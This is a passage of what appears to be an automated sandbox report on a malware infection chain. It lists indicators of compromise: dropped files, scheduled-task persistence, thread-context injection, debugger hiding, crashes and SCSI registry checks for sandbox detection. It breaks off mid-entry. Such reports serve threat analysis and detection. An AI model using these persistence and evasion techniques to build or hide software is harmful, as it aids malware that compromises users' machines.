C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content mask_svc.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #4 svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{3e31b346-9694-114d-890d-e7706feeb03e}\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{3e31b346-9694-114d-890d-e7706feeb03e} DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF DrvInst.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData mask_svc.exe File opened for modification C:\Windows\System32\Tasks\13 svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{3e31b346-9694-114d-890d-e7706feeb03e}\SETDDAD.tmp DrvInst.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #2 svchost.exe File opened for modification C:\Windows\System32\Tasks\AdvancedWindowsManager #6 svchost.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI rundll32.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8408FE5CA4467EE4DA84A76EF238FE3 mask_svc.exe File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 5F7BD2BE0CAE9B0C svchost.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF MicrosoftEdgeCP.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{3e31b346-9694-114d-890d-e7706feeb03e}\SETDDAB.tmp DrvInst.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\82CB34DD3343FE727DF8890D352E0D8F svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 0F3E4A66D940DC97 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft mask_svc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache mask_svc.exe File opened for modification C:\Windows\System32\Tasks\services64 svchost.exe File created C:\Windows\system32\Microsoft\Libs\WR64.sys conhost.exe File opened for modification C:\Windows\System32\Tasks\PowerControl HR svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent 03DC67693FB036E5 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\82CB34DD3343FE727DF8890D352E0D8F svchost.exe File opened for modification C:\Windows\System32\Tasks\Time Trigger Task svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{3e31b346-9694-114d-890d-e7706feeb03e}\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\Tasks\AdvancedUpdater svchost.exe File created C:\Windows\system32\Microsoft\Libs\sihost64.exe conhost.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File created C:\Windows\System32\DriverStore\Temp\{3e31b346-9694-114d-890d-e7706feeb03e}\SETDDAB.tmp DrvInst.exe File created C:\Windows\system32\services64.exe conhost.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe File opened for modification C:\Windows\System32\Tasks\BtWbiTx svchost.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini rundll32.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat DrvInst.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol rundll32.exe File opened for modification C:\Windows\System32\GroupPolicy rundll32.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
Processes:
ZXcnQ9RG_DYkOXXTxjQ0IPtt.exeDg_Ebh8ihIYC1JCfpRAyNWiT.exe366B.exemask_svc.exemask_svc.exemask_svc.exepid process 5956 ZXcnQ9RG_DYkOXXTxjQ0IPtt.exe 5248 Dg_Ebh8ihIYC1JCfpRAyNWiT.exe 8788 366B.exe 10524 mask_svc.exe 5312 mask_svc.exe 11108 mask_svc.exe -
Suspicious use of SetThreadContext 55 IoCs
Processes:
Sat1427fbafcf251.exeB8YkkT0rY7k3CXY_wSzatFSY.exezcwm5iBuVOBi3eEoRbXV0gY2.exepkEHV3QnxJNQawwSUY_T9v6l.exeConhost.exeWerFault.exeghyLwzsW68yJrRDdcOnQsReb.exesvchost.exe7063847.exeF30D.exe7432933.exe6199182.exeD8BA.exeCalculator.exeE757.exepowershell.exebuild3.exebuild2.exefgfbdigConhost.exemstsca.exefgfbdigmstsca.exeE757.execonhost.exemstsca.exemstsca.exemstsca.exeE757.exemstsca.exemstsca.exemstsca.exefgfbdigmstsca.exemstsca.exeE757.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exeE757.exemstsca.exemstsca.exemstsca.exefgfbdigmstsca.exemstsca.exeE757.exemstsca.exemstsca.exemstsca.exemstsca.exemstsca.exedescription pid process target process PID 68 set thread context of 4332 68 Sat1427fbafcf251.exe Sat1427fbafcf251.exe PID 5988 set thread context of 1932 5988 B8YkkT0rY7k3CXY_wSzatFSY.exe B8YkkT0rY7k3CXY_wSzatFSY.exe PID 6024 set thread context of 816 6024 zcwm5iBuVOBi3eEoRbXV0gY2.exe zcwm5iBuVOBi3eEoRbXV0gY2.exe PID 4800 set thread context of 5996 4800 pkEHV3QnxJNQawwSUY_T9v6l.exe pkEHV3QnxJNQawwSUY_T9v6l.exe PID 6116 set thread context of 5492 6116 Conhost.exe 6PzDKqTumYc6wQmCZmE1EFMz.exe PID 4488 set thread context of 5056 4488 WerFault.exe R9JjaNeErim9RBtGd3_3uQhr.exe PID 5132 set thread context of 6392 5132 ghyLwzsW68yJrRDdcOnQsReb.exe ghyLwzsW68yJrRDdcOnQsReb.exe PID 2868 set thread context of 6724 2868 svchost.exe svchost.exe PID 4672 set thread context of 5880 4672 7536159.exe PID 7008 set thread context of 3980 7008 7063847.exe 7063847.exe PID 4348 set thread context of 6900 4348 F30D.exe F30D.exe PID 7120 set thread context of 7076 7120 7432933.exe 7432933.exe PID 5204 set thread context of 5768 5204 6199182.exe 6199182.exe PID 7000 set thread context of 6192 7000 D8BA.exe D8BA.exe PID 6744 set thread context of 9756 6744 Calculator.exe 8217699.exe PID 9552 set thread context of 1400 9552 E757.exe E757.exe PID 8452 set thread context of 5520 8452 powershell.exe E757.exe PID 6324 set thread context of 10720 6324 build3.exe build3.exe PID 8568 set thread context of 11088 8568 build2.exe build2.exe PID 9180 set thread context of 10892 9180 fgfbdig fgfbdig PID 7576 set thread context of 5164 7576 Conhost.exe mstsca.exe PID 8820 set thread context of 8848 8820 mstsca.exe mstsca.exe PID 6020 set thread context of 11164 6020 fgfbdig fgfbdig PID 6264 set thread context of 4552 6264 mstsca.exe mstsca.exe PID 9312 set thread context of 2228 9312 E757.exe E757.exe PID 8044 set thread context of 3620 8044 conhost.exe explorer.exe PID 4520 set thread context of 908 4520 mstsca.exe mstsca.exe PID 6636 set thread context of 2784 6636 mstsca.exe mstsca.exe PID 8488 set thread context of 6248 8488 mstsca.exe mstsca.exe PID 10048 set thread context of 10244 10048 E757.exe E757.exe PID 11012 set thread context of 9520 11012 mstsca.exe mstsca.exe PID 10972 set thread context of 4920 10972 mstsca.exe mstsca.exe PID 4020 set thread context of 4852 4020 mstsca.exe mstsca.exe PID 4108 set thread context of 7880 4108 fgfbdig fgfbdig PID 6640 set thread context of 9296 6640 mstsca.exe mstsca.exe PID 8876 set thread context of 7944 8876 mstsca.exe mstsca.exe PID 4712 set thread context of 10664 4712 E757.exe E757.exe PID 8916 set thread context of 11064 8916 mstsca.exe mstsca.exe PID 224 set thread context of 5976 224 mstsca.exe mstsca.exe PID 3900 set thread context of 7228 3900 mstsca.exe mstsca.exe PID 8280 set thread context of 3384 8280 mstsca.exe mstsca.exe PID 1188 set thread context of 4112 1188 mstsca.exe mstsca.exe PID 6032 set thread context of 2492 6032 E757.exe E757.exe PID 8344 set thread context of 6024 8344 mstsca.exe mstsca.exe PID 8260 set thread context of 7840 8260 mstsca.exe mstsca.exe PID 5264 set thread context of 7028 5264 mstsca.exe mstsca.exe PID 6816 set thread context of 10820 6816 fgfbdig fgfbdig PID 9044 set thread context of 3812 9044 mstsca.exe mstsca.exe PID 9932 set thread context of 6036 9932 mstsca.exe mstsca.exe PID 7724 set thread context of 6856 7724 E757.exe E757.exe PID 6704 set thread context of 4976 6704 mstsca.exe mstsca.exe PID 2888 set thread context of 3980 2888 mstsca.exe mstsca.exe PID 5024 set thread context of 5724 5024 mstsca.exe mstsca.exe PID 2856 set thread context of 1984 2856 mstsca.exe mstsca.exe PID 8712 set thread context of 9500 8712 mstsca.exe mstsca.exe -
Drops file in Program Files directory 64 IoCs
Processes:
autosubplayer.exeautosubplayer.exevpn.tmpautosubplayer.exeDYbALA.exeHucq3cRU783T_YaR6f0rcMBe.exeDYbALA.exedescription ioc process File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libtcp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\MaskVPN\driver\win764\is-RBL52.tmp vpn.tmp File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_gloss-wave_35_f6a828_500x100.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libnuv_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_ps_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libavi_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libvobsub_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\equalizer_window.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\intf\modules\host.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libafile_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\misc\libfingerprinter_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\MaskVPN\driver\win764\is-CNTFG.tmp vpn.tmp File opened for modification C:\Program Files (x86)\lighteningplayer\uninstall.exe autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\sandbox.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dts_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\mobile_browse.html autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\liveleak.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_streams.luac autosubplayer.exe File created C:\Program Files (x86)\MaskVPN\is-7MD7K.tmp vpn.tmp File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libvc1_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\modules\host.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\control\libgestures_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\control\libgestures_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libnoseek_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libxa_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\spu\libmosaic_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libsubsdelay_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\custom.lua autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\data_load.exe autosubplayer.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-5E67J.tmp vpn.tmp File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libfingerprinter_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\modules\dkjson.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libtaglib_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libnfs_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libscreen_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libmjpeg_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libsatip_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\Google\Gituzhuzhaesae.exe.config DYbALA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libvcd_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_hotkeys_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\d3d11\libdirect3d11_filters_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe Hucq3cRU783T_YaR6f0rcMBe.exe File created C:\Program Files\Mozilla Firefox\CHYTVKIQHN\foldershare.exe.config DYbALA.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_imem_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_75_ffe45c_1x100.png autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.xml autosubplayer.exe File created C:\Program Files (x86)\MaskVPN\is-ADKQF.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-C80OC.tmp vpn.tmp File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libaiff_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\keystore\libmemory_keystore_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_wasapi_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\liblogger_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\rockbox_fm_presets.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\create_stream.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\Back-48.png autosubplayer.exe -
Drops file in Windows directory 64 IoCs
Processes:
MicrosoftEdge.exemsiexec.exeDrvInst.exeMicrosoftEdgeCP.exeShellExperienceHost.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeDrvInst.exeJupikoqezhae.exeSearchUI.execmd.exeexplorer.exeexpand.exeMicrosoftEdgeCP.exetaskmgr.exesvchost.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exesvchost.exeMicrosoftEdge.exeMicrosoftEdgeCP.exedescription ioc process File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Installer\f7afbc2.msi msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSI633E.tmp msiexec.exe File created C:\Windows\Installer\f7afbc5.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIBE9C.tmp msiexec.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp File opened for modification C:\Windows\Installer\f7afbbe.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI6AF7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIAAD1.tmp msiexec.exe File opened for modification C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\rescache\_merged\4032412167\2690874625.pri ShellExperienceHost.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\Installer\MSIEDD5.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI7254.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI762E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIAD72.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI670E.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log MicrosoftEdgeCP.exe File created C:\Windows\INF\oem2.PNF DrvInst.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new Jupikoqezhae.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\rescache\_merged\1601268389\3068621934.pri SearchUI.exe File opened for modification C:\Windows\Installer\MSICAA7.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID9AE.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Tasks\13.job cmd.exe File opened for modification C:\Windows\Installer\MSI6CF4.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA4E4.tmp msiexec.exe File created C:\Windows\rescache\_merged\2717123927\1713683155.pri explorer.exe File opened for modification C:\Windows\Installer\MSIA7C3.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI77FB.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new Jupikoqezhae.exe File opened for modification C:\Windows\Installer\MSIF0D4.tmp msiexec.exe File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\1601268389\3068621934.pri taskmgr.exe File opened for modification C:\Windows\Tasks\13.job svchost.exe File created C:\Windows\Installer\f7afbc2.msi msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File created C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File opened for modification C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSID4AB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSID3C2.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File opened for modification C:\Windows\Installer\MSIB207.tmp msiexec.exe File created C:\Windows\rescache\_merged\4032412167\2690874625.pri explorer.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI6FBB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9B9B.tmp msiexec.exe File created C:\Windows\rescache\_merged\4183903823\1195458082.pri taskmgr.exe File created C:\Windows\rescache\_merged\4183903823\1195458082.pri ShellExperienceHost.exe File opened for modification C:\Windows\Installer\MSIF9BE.tmp msiexec.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 55 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 3904 4044 WerFault.exe Sat14febbc433.exe 4344 4044 WerFault.exe Sat14febbc433.exe 4692 4044 WerFault.exe Sat14febbc433.exe 4256 4044 WerFault.exe Sat14febbc433.exe 4356 4044 WerFault.exe Sat14febbc433.exe 2112 5028 WerFault.exe setup.exe 500 4044 WerFault.exe Sat14febbc433.exe 4496 5028 WerFault.exe setup.exe 4356 5028 WerFault.exe setup.exe 5220 5028 WerFault.exe setup.exe 5444 4044 WerFault.exe Sat14febbc433.exe 5476 5028 WerFault.exe setup.exe 5132 5860 WerFault.exe _0aRxV7zFs9aNhsV38TcVZ3L.exe 5476 5860 WerFault.exe _0aRxV7zFs9aNhsV38TcVZ3L.exe 4180 5860 WerFault.exe _0aRxV7zFs9aNhsV38TcVZ3L.exe 6140 5728 WerFault.exe sDpSUCcF7crBKFAL0nlkdsFL.exe 2040 5860 WerFault.exe _0aRxV7zFs9aNhsV38TcVZ3L.exe 5840 5028 WerFault.exe setup.exe 6132 5728 WerFault.exe sDpSUCcF7crBKFAL0nlkdsFL.exe 4528 5728 WerFault.exe sDpSUCcF7crBKFAL0nlkdsFL.exe 4688 5728 WerFault.exe sDpSUCcF7crBKFAL0nlkdsFL.exe 6548 5860 WerFault.exe _0aRxV7zFs9aNhsV38TcVZ3L.exe 2620 4536 WerFault.exe h_tWKtjPYNuVSFdaShBLfLrO.exe 1844 4536 WerFault.exe h_tWKtjPYNuVSFdaShBLfLrO.exe 3316 4536 WerFault.exe h_tWKtjPYNuVSFdaShBLfLrO.exe 3492 4536 WerFault.exe h_tWKtjPYNuVSFdaShBLfLrO.exe 7416 4536 WerFault.exe h_tWKtjPYNuVSFdaShBLfLrO.exe 8096 4536 WerFault.exe h_tWKtjPYNuVSFdaShBLfLrO.exe 7400 4536 WerFault.exe h_tWKtjPYNuVSFdaShBLfLrO.exe 5176 3968 WerFault.exe GcleanerEU.exe 8796 8448 WerFault.exe gcleaner.exe 9132 3968 WerFault.exe GcleanerEU.exe 3440 8448 WerFault.exe gcleaner.exe 9252 3968 WerFault.exe GcleanerEU.exe 9536 8448 WerFault.exe gcleaner.exe 9648 3968 WerFault.exe GcleanerEU.exe 9968 8448 WerFault.exe gcleaner.exe 6424 9332 WerFault.exe GcleanerEU.exe 9536 10032 WerFault.exe GcleanerEU.exe 10160 10212 WerFault.exe gcleaner.exe 9816 10212 WerFault.exe gcleaner.exe 7156 8716 WerFault.exe gcleaner.exe 4488 8716 WerFault.exe gcleaner.exe 968 3968 WerFault.exe GcleanerEU.exe 9592 8716 WerFault.exe gcleaner.exe 4124 8448 WerFault.exe gcleaner.exe 9260 8716 WerFault.exe gcleaner.exe 8968 8448 WerFault.exe gcleaner.exe 6500 9332 WerFault.exe GcleanerEU.exe 8124 8448 WerFault.exe gcleaner.exe 9984 9332 WerFault.exe GcleanerEU.exe 8652 9332 WerFault.exe GcleanerEU.exe 10180 10368 WerFault.exe rundll32.exe 9776 6372 WerFault.exe safbdig 152 9348 WerFault.exe autosubplayer.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exeMicrosoftEdgeCP.exeDrvInst.exetaskmgr.exeDrvInst.exedcfbdigtrfbdigcmd.exetapinstall.exesvchost.exeyoX1lbJjB0CYEqqcW6Y2Yb_p.exeexplorer.exedcfbdig6PzDKqTumYc6wQmCZmE1EFMz.exetrfbdigdescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 MicrosoftEdgeCP.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Service DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Mfg svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key 